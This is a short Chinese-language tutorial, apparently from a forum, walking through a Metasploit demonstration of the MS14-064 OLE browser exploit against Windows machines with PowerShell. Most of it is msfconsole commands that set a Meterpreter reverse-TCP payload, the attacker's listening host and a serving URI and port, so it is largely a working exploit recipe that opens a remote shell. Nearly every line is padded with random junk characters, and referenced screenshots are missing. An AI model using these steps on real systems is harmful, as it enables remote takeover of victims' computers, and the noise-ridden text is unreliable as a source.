% u+ s+ F2 ^. o3 F+ p% n2 R- c) } 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 n" X" C! ]9 j; V- b1 ~, U6 T h
6 A) |2 G$ \" ^3 W. z, @! Q/ E$ G3 |' D, y+ G
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
' c8 [; ]7 C, v, \% v( J7 [* S
- n! @# b$ i8 Q @0 D; p: H2 h3 ~. \3 ]7 Z- ^) V
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ B, s7 x% z+ F# A
) k. ` x, |, n% Z
; r1 T+ P4 c2 ~! l, p
set AllowPowershellPrompt true
$ G4 V- F3 P) e9 { l
+ O2 Y9 [' S8 I, g; M3 j
0 F4 `2 U; D! C2 ] Set LHOST 192.168.0.109; {* v; W ]* A" x/ {' v. [
$ m7 u! f4 P! l5 }; q
5 K0 w3 D# n# U; v1 { set SRVHOST 192.168.0.1090 F( `" e) z/ i- Y
( J! g9 t& r3 w i9 I
7 o' C7 ~2 R' k8 Q
Set uripath share+ L7 w0 P3 X. b8 D$ K6 t& Q
: j* I( V- R0 S2 f# {4 Z( i$ t" H" y6 ]6 N
Set srvport 80! y5 G- Q5 b! `$ T0 z: k
8 S8 `- `& N, |. O& D7 t; u0 T6 d0 ~9 [. ?7 I3 @
4 B t$ e/ A/ V: r0 L
b$ d+ |9 D! I9 d* k( @; B! Q* E! K o, g J9 B
: m6 Z8 n8 i1 b% j" |1 p
9 y$ s9 r7 ^+ F, k9 D- t: B/ w, R6 [( u Q
9 F3 P7 R$ j! Q; n8 ~# E3 G$ ~
8 T) k8 w; z0 l: j' O. k# { d; t6 I7 `0 j3 Y$ v/ d
3 X# S/ Q+ N6 H m5 k
. ?0 ~2 m3 U0 z
5 e( O+ c1 Z5 M . _5 `# e: y0 q- U& B
f0 _4 _8 d) Q( O* [
9 L; ?; Y7 N2 Z- N" p4 J3 W2 \ 下面我们来访问本地地址如图:! u7 v; V3 f: k& G3 l' u' N, v; \
3 l5 Q w& d' G4 N+ A6 w
: n' N/ r% X/ h- i
) h$ { q7 q' T# E+ u5 x0 Q
/ `. R, L+ ?! A' M# h
9 p, j2 j2 _. ^' e. f C# E
* C" I1 \! s: v8 R- V4 v
$ A4 s! T2 F; p
+ y0 v0 A* |- X" V2 o8 C
" ^1 k# s% f* G' T5 _8 y5 u! x# U